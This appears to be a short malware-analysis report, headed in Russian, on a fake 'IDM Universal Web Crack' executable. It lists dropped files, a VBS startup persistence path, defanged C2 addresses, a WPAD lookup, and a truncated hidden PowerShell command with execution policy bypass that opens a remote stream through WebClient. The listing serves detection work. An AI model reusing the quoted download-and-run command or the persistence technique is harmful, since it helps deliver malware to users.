Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\script.vbs
- %TEMP%\IDM Universal Web Crack.exe
- %TEMP%\script.vbs
- 'wp#d':80
- '12#.#99.237.202':80
- http://11#.#11.111.1/wpad.dat via wp#d
- http://12#.#99.237.202/idmcrackversion.txt
- DNS ASK wp#d
- '%TEMP%\IDM Universal Web Crack.exe'
- '<SYSTEM32>\wscript.exe' "%TEMP%\script.vbs"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient....